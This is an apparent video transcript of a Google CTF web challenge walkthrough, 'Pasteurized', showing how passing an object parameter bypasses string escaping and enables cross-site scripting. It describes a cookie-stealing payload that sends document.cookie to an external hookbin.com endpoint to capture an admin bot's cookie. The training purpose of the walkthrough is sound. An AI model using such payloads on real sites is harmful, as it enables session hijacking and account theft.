 Hello everyone, my name is John Hammond and welcome back to the YouTube video and today I want to be showcasing one of the web category challenges from this year's Google CTF That was online this past weekend. The Sun is like right there So please forgive me if I have apparently a halo on the side of my head But before we dive in I need to put out a disclaimer. I had not solved this during the competition during the capital flag itself I'm not that good. First of all And I didn't spend a whole lot of time on this. It's funny I think my friends and I opened up the Google CTF and we looked at it for like maybe an hour or less and then we're like Okay, we should probably go prepare and keep building challenges for the CTF that we're hosting next month So secret spill there, but admittedly I did not spend a ton of time on this So I'd love to showcase more Google CTF stuff for you, but honestly, I'm not that smart I'm still learning and especially for capital flags that are like this. They're legit Man, I still have a lot to learn too So I will be showcasing this with the help of write-ups that I have read and I do want to use that to footstomp and emphasize Don't hesitate to read write-ups. We're all trying to learn. The whole point is to get smarter and get better So I have looked at this more when I was going through it the first time in my perspective I'll showcase the kind of the rabbit holes that I fell down And then when I put it away and I didn't go through the solution now that I know that through the write-up I wanted to share that with you. So that's my disclaimer. Anyway, let's dive in. This is pasteurized This is literally the easiest like lowest point value challenge that Google CTF had I still wanted to showcase it for you because there might be some kind of cool and neat and interesting tricks So let's fire it up. This challenge says it doesn't look secure I would even put the I wouldn't put even the little a secret in here My source tells me that the third parties might have implanted it with their little treats already Can you prove me right? So we have this URL Clicking on this it looks like pasteurized and I pronounce it pasteurized because I realize that's kind of the The gimmick of this challenge where you can create a new paste And we could theoretically just type in anything here. So please subscribe sure I'll submit that and That will apparently render out my input on the page And I guess that's kind of the idea the number numeric value for that specific note or paste that we've gone in here We could share with tj mic interesting And we can go back. Okay, so I can add in anything we particularly want here So since we had that option to share with tj mic That's oftentimes very similar to like a okay report to admin or maybe tj mic is the admin and If we can input pay input data onto a page and it might be shown again Potentially this web challenge is setting us up for a cross site scripting attack if we are reporting it to an admin maybe we might do some Interesting dynamic like browser stuff getting things on the client side of his browser And maybe he will render a java script and some of the client side code that will execute due to cross site scripting We could grab some information from his perspective like grab the admin cookie or view the admin page Or do some other drive by stuff and bring him along to other pages That's all the neat and interesting things we can do with cross site scripting So as a thought for that I can try and Enter some html tags like h1 Like a big header and see if that gets rendered out or reflected to me and looks like that does that did increase the size here And we could share that with tj mic just to see what happens. It says tj mic will appreciate your paste shortly Okay I see a little captcha down here Where my face is let me try and hide that so you can see look looks like it does need to be Kind of put together in the web browser so Doing some tricks might get in the way if we try to automate this or do some other things without avoiding that captcha anyway Since we know we do potentially have some code that could come through here We could try interesting things like a script and then let's do an alert one and script see if we can run javascript code and that Didn't do anything seemingly Which is weird. Uh, so we could do kind of our actual normal stuff. Let's look at the source code and really see what's going on here Looks like they actually even reference the source code of this web page. It's hidden It's not going to be displayed on the web page, but that might be something we could access or go to So let's Go that let's download that. Okay. Uh, I'm just going to W get this. Let's let's hop on over to my terminal I had created a little folder ctf google ctf web and then for that challenge. I've already downloaded the source Let me clear that out. So You get a fresh perspective. There we go. Uh, let me move that source to a source.js Because looking at it in this browser here, it looks like it's express And like no to running javascript server side in the background So let me go ahead and open that and sublime text and let's look through this code So we are using the express framework that back inside of javascript Looks like it'll be able to do some parsing things requiring utilities, which is seemingly local recapture UIDs that mo that must be the note kind of id or title that we saw and the data store. Okay recapture stuff Choo Choo is running the express engine Looks like it's going to use ejs for kind of templating and pages Getting static pages. They say recapture need these interesting and just a data store Okay, this just looks like kind of the schema or Functions as to how we're putting things in the database of what notes we have guessed It's probably us and public has got to be just about everything so That's peculiar nothing Weird there that I see that we could I guess get in the way of but I mean that's just going to be the database That's just just the data store itself We create that database and then we have this little escape string functionality Which looks like it's going to do some replacing Oh to remove those less than and greater than symbols that we might use for some html But it looked like it rendered that out that was weird Did it do that when we use the h1 tags? So we render out the home page If we post to it We need to verify that we actually have a note to use And we create the note id u u id we saw that earlier Out of the database etc. Etc and redirect it to the note id Properly escape the note. Okay, so can we not Bother with some of these Does it Does our xss payloads or a cross-site scripting will that kind of get in the way? Yeah, okay, so we run that escape string thing over here and that will Replace out our less than and greater than symbols. That's frustrating and annoying Share your pace with tj mic. Okay, so that's us reporting and sending it to the admin And he will just straight up go to the page. Okay, cool And there's the source code link. We've got that and then just run Good enough So let me actually look at the page itself that uh once we shared a note. Why didn't it display our script tags? Let me let me start with the with the hello Or the h1 header tags I'm gonna view the source here. I hit control u on my keyboard Oh, it's using dom purify. Did we see that in the source code dom purify purify Purify that's not on the source code. It's all client side. So dom purify is kind of like a big well known Sanitization library it'll like help try and purify and and clean her out and make sure there's no unneeded and unnecessary and evil and nefarious code Oh, and there's some client side stuff here fix Something funky in the source code that could lead to cross-site scripting. What is that b137 like bite 137 1337 Can I go to a specific character in sublime text? Like what is 1337? Is that literally where the weirdness is going to be? I guess I can like hex edit it Let me let me hex edit source.js and go to uh 1337 what is that what is python Oh, no, yeah, what is 1337 in hex? That's kind of what i'm asking. This is probably a stupid idea This is probably not literally what's so useful whatsoever five three nine This guy Yeah, that's not that that's not what that b stands for I don't I don't know and I don't need to worry about it But something could apparently lead to cross-site scripting. Okay interesting Oh, so this is the replace or that escape string function coming in action here We can see our greater than and less than symbols were replaced with these hex codes We have our node id and it uses dom purify to sanitize it and clean it. So that's interesting So that will prevent us from using Some of the other things that we tried to use like our script alert one script script script, please And renders it out on the page With this That doesn't help. Okay, so that's in the way um Maybe we could do peculiar things because if this is what's actually being put in the page If we can't use our greater than and less than symbols, could we do anything funky to like break out of this string? and get our Inserted javascript code like leaking into this section of code here Maybe we could try and just include a double quote to try and terminate that string Let me try that I have a lot of view sources open that I don't need so let me close out some of those um, we'll just do a please sub I guess Yeah, so we would end that string and then we would have a semicolon to denote a new command And then I guess I'll like I'll comment out a message to see if that goes through as well We have the source code. So we really only should see the oh, I hit share with mic my bad We really should only see those um greater than less than symbols replaced, but They also escape our double quotes Okay, so Looking at this code And we're still in the phase of me trying this myself me me experimenting with this when I Did not know the solution and was going through it cold. I thought like maybe I should be finding some weakness in Dom purify, right? Because if that was the library that they were using there, maybe there's like a dom purify exploit or cross site scripting vulnerabilities And so what you can see me literally like some of my old Revisited links where I would take a look at some of the potential vulnerabilities Maybe they could have some cross site scripting in some older vulnerable versions like 2.0 2.03 And I was like, oh goodness. Maybe this is a lead. What do I have to work with? So I thought like What version of dom purify are they using in this challenge? Checking out the version of dom purify just looking at it on the web page I see github cure 53 dom purify blob and maybe that's 2.08 and that's not very That's not any of the research that I had done previously I'm looking for a version less than that that might potentially be vulnerable to this thing and maybe that's still a complete Guess due to my research I also did things I just would search for version and I would do like Other version checks to see if that was really what it was in case they didn't have that note here in the header I don't think I actually saw that 2.08 originally and I just searched for version And when I saw that reference of 2.0 12, I was like, well, okay. I'm way out of luck. That's not going to help me literally whatsoever so at that point playing the game real time and I have the classic millennial dilemma of my weak and low attention span After after an hour of like maybe fumbling with this and I didn't have a lead I was like, all right. I should go do something. It's actually productive for me personally Not that this isn't But I was like, I should be building things So I put this away and I waited for some write-ups to come out because I'm always looking forward to google ctf write-ups Or any any bigger or legitimate capture the flag competition and try and see what really cool techniques and stuff is in place here so again, I say that with my disclaimer and my Full frontal honesty and transparency full frontal is not the right word for that Uh I I looked at these write-ups and I saw Really what could have been peculiar and interesting there and it's funny while I was looking through this I completely glossed right through the solution this escape string Little function here a little thing that they're they're putting together is odd and interesting This comment who wants a slice? It's kind of taunting. It's kind of weird And it doesn't really match any of the other comments Maybe you could use that to like pick it out needle in a haystack, but uh What they do here aside from this replace line And I know this replace line kind of sticks out to you naturally because that's just Kind of what you look for and most common capture the flag stuff or when I do a lot of php stuff like php challenges Javascript is kind of an oddball thing for me to see when I look at express or know it But I know a lot more cool legitimate ctfs are using these here. So Put this away put this away. We know that that'll work mentally It'll be replacing our less than a greater than symbols, but this json on stringify with our inputs This is an oddball thing and we could research kind of what this does or we could step through it It slices out seemingly the first elements or like the first character in that Iterable that lists that string particularly and then it'll go to negative one So up to the very very last character in that If we were to tinker with this if we were to play with it, maybe we could see it do some peculiar things So let me put that over here and I'll put Another terminal over here and I'll just run like node, right? So I can work with javascript locally on my side if you don't have that on ubuntu I think it's sudo apt install node js, but let's just create a string like hello And there's our string now Let's try to use some of that syntax that they use where they use json stringify unsafe We could see the normal operation for it json stringify Hello, and it will just take It'll be like a string of the string. So it's including these double quotes here And if I actually had a I guess another Quote in here. Hello, john You can see that's going to just be escaped. So Great, that's the gimmick and tweak that we fall into But then they slice it right so they go ahead and slice from the first character all the way to the just about last one So those Surrounding quotations are removed and all you're just left with that escaped backslash or quote if you were to use it So that would get in the way for you That's important to note This is the normal functionality kind of the what we've seen but if we were to do some research on that json stringify On the stringify You can see some references here documentation The json stringify method converts a javascript object or a value to a json string Now this is interesting because they know that javascript object Not just a value when we're looking with our string that we supplied like hello or our note or anything That's going to end up being just a regular value. That's going to be a string Interestingly enough if you were to pass it an object and this is like literally the first example they show you It's not going to end up Putting those double quotes in there. In fact, it'll do weird things where it has the curly braces that denote an object in there So if we were to tinker with this Let me try and just put together an object. It'd be like A can equal Please sub or whatever. So now I don't include the dot slice here removing the first and last characters But you can see the very first character is an open curly brace and an ending curly brace for the last one So if I were to slice this out We don't actually have our double quotes escaped out That's useful for us, right because now we could end up Maybe potentially passing an object to this little note application and it could Actually have our double quotes in there and escape out that string that we were trapped inside in the java script That was visible on the web page. So I Tried to do this originally. I knew that I could pass after kind of again Illusion is over, right? Our our artifice is gone. We we've broken down the fourth wall We know that we could potentially be Can I please go back? Okay. Thank you We would be sending in data through A variable here in the form with a post method And it's going to be named content. So Knowing that I could maybe pass an object or an HTTP object through to it How could I do that that syntax usually means that you'll have to supply some like curly Or square braces around or just following after the name of the variable that you want to make an object So I would do this with curl like just to see I originally just wanted to test this So let me break out of node and let me go ahead and curl over to this url That will return the page for me, which is nice and fancy But I do want to go ahead and post to this And it needs to actually have the content being supplied, right? So I will specify with tack d to denote the variable that I'll pass along Content or the data right that we supply content is the name of that variable And we'll just include for sanity check. Please sub and this will redirect me to The note I could very very well pass along Content with these open and close square braces. Now. I know that I'm passing an object And that seems to take it and it'll redirect me again to a new note in curl. You could follow redirects with tack capital l But I think that keeps the post method in place and I off the top of my head. I didn't know how to just post to the first page and then not post to the second one So I thought okay curl won't won't won't be a good one for me Let's just fire this up in python as kind of my my usual knee jerk reaction user bin environment python I will go ahead and import requests and I will Use requests dot post on that URL. So I'll grab that I'm using requests because I know I'm going to be using some Internet or web functionality making get and post requests to web pages. So I'll pass the URL there I'll include data as a dictionary And content should be the name of that variable But remember to pass an object we need to include these curly braces here or square braces. Sorry So I will go ahead and set that to please sub And now let's capture that as a variable and then go ahead and print Out the response from that. So r dot text and I'll hit control b to run this I'm using the build view plugin and sublime text so I can go ahead and move this into another tab I hit shift alt and 2 to open that other tab and I'll go ahead and mark that as HTML so it's a little bit easier to read and work with here You can see over on that side We do have the page returned to us and down below checking out the source code that should be rendered out on the page please sub has these Double quotes here and we're we're properly broken out of the original quote. So knowing that we could maybe Start to inject our own javascript. Let's put a semicolon here Over in our please sub payload and obviously we want to be running real javascript, right? So let's use just an alert one for kind of a proof of concept. So it would look like a Semicolon there and then our code being injected and we'll have to remove out these other Double quotes. So let's have a forward slash forward slash there to comment that out if I were to run that Now we should have that in our page with literal javascript and I have the note ID So I can go visit it in my browser to see if that will actually work for me Let's go to slash that location and I have a little proof of concept javascript alert box Fantastic, okay. Now we have our javascript in place So that means we could do the real cool regular cross-site scripting stuff when we were to send this over to tj Mike or the admin what you would normally want to do is capture their cookie That's like the first thing you could always easily reach for like low hanging fruit Maybe you'd have to do weird things to like read the admin page or drive him to someplace else to turn on a setting Who knows? Let's start with just simply grabbing his cookie see if that's where that challenge leads us Again removing the illusion We've read write-ups on this the competition is now over that is all we have to do is grab his cookie Normally I would do this with sort of a Bring your own box or by ob external server that any internet Object or other other server online could reach and access So I use a digital ocean droplet for something like that or something you could host up with google cloud or aws Or is your whatever you want. I'm actually just going to end up doing this with hook bin I've seen Hook bin hook bin.com is right. Okay. I've seen request bin. I think something weird happened to them I've seen other ones that do this sort of thing, but this will just be an online service that will wait to catch Capture and then go ahead and inspect HTTP requests. So you can use this as a really good way to just gather some External cookie or something if you're doing a cross site scripting attack. It's hook bin.com I'll go ahead and create a new endpoint. So I'll take this guy This is our link and once we have something that requests that link We should be able to see all the capture data here if we were to refresh this page So what I'll do is I'll use my kind of insert section for javascript I'll go ahead and create a new dumb object for an image super duper easy Right. I'll use a new image and then I'll take that object with the dot selector and I'll supply the source here So src and then we want to include a string value here But we can't use our double quotes because we're already inside double quotes And we know that this will escape out our double quotes So let's just use single quotes here because javascript will handle that nicely Let's paste in that link and then let's go ahead and actually Supply a question mark to supply some other variables in there like a get request So I'll say c equals so c could be a cookie or whatever value name you really really want Maybe c keeps it nice and easy for you and let's just append on or add in with the plus sign the document dot cookie So when I view this in my browser, maybe I have some cookie set and we would see that request go through in hook bin Maybe I don't maybe we don't see anything But when we send this to tj mic or the admin we'll get his cookie So that is kind of all we want to do with this attack. Let me go ahead and post this request Looks like that has came through we see our code properly injected here our new image source going to that location commenting out the rest of it And I'll have this node ID that I can copy and access within my browser So let me hop over and go to this location I will actually fire up the network tab so you can kind of see this come through If I go ahead and paste this in I make a request to that There we go And do I make a request to this location? Looks like I do that's hook bin right there And that was a successful query. It looks like that responded or didn't actually give me anything back totally fine Maybe it was just like a true thing But that was able to go ahead and post some data there So we know that this should work because our local test did run just fine here If I were to go ahead and report this to tj mic We should be able to see his result his cookie his data over on that hook bin If we go back to the hook bin if I refresh this page. Do I see my request? Yes, I do perfect So this came from me accessing it locally You can see my web browser there and my query string that c variable didn't actually have any cookie or anything associated with it No problem. That's fine. We have our proof of concept. Now. Let's go ahead and share this with tj mic Looks like that all went through and tj mic will appreciate your paste shortly So let's hop back on over to hook bin refresh this page and see if we have anything new I see something come through which might be a different Responder and it is I can see the headless chrome user agent there and we have our query string our secret ctf express to troubles Nice that's a good flag. So that's it. There is our flag. That was the technique that was all that we needed to do We could go ahead and submit that. I know the game's over now But cool, whatever we made 50 points on the easiest challenge that google ctf had But hey, hopefully that was a cool learning point and maybe you had some fun with it If you hadn't seen this sort of thing before That was a peculiar thing for me Admittedly, I wish I had spent more time on it. You know every time a ctf comes by and we kind of regret Oh, man, I wish I Did more for that. I wish I tried harder I wish I kept banging my head against the wall because it would have been really really cool To get that in the moment, but I don't want that to take away from the value of reading write-ups So with that shout out and kudos to all the incredible people that do release write-ups for these sort of things You guys are also incredible prolific valuable members of the community. Obviously obviously you all are But seeing everyone sharing the knowledge and helping everyone grow is a super cool thing So shout out to everyone that wrote a write-up And I'm very excited to read more of those for different challenges on google ctf And maybe I can showcase another if you guys thought this was valuable I don't want this to be completely useless because obviously write-ups out there already exist But maybe it's cool to see a walkthrough in a video format of it And uh, see everything every single step and every single action that has to be taken and done For all that to work and see more of the thought process in real time. So I hope that's cool, but All right, that's enough of me jabber and thank you so much for watching I hope you guys enjoyed this video if you did please do do the youtube algorithm things You know, I'm super duper grateful if you could hit that like button If you could maybe type something in the comments, whatever I'd be grateful If you could please subscribe Thank you. Thank you. Thank you If you want to go above the call if you want to go way above what is necessary I would be incredibly flattered if you could drop a donation And I always appreciate your support patreon paypal those are links in the description I just kind of tweaked up some of the patreon tiers. So I'm I'd be I'd be super duper flattered to see your love and support So thank you. Thank you. All right, everybody. That's the end of the video. I'll see you tomorrow for some other cool stuff Take care. I love you. Bye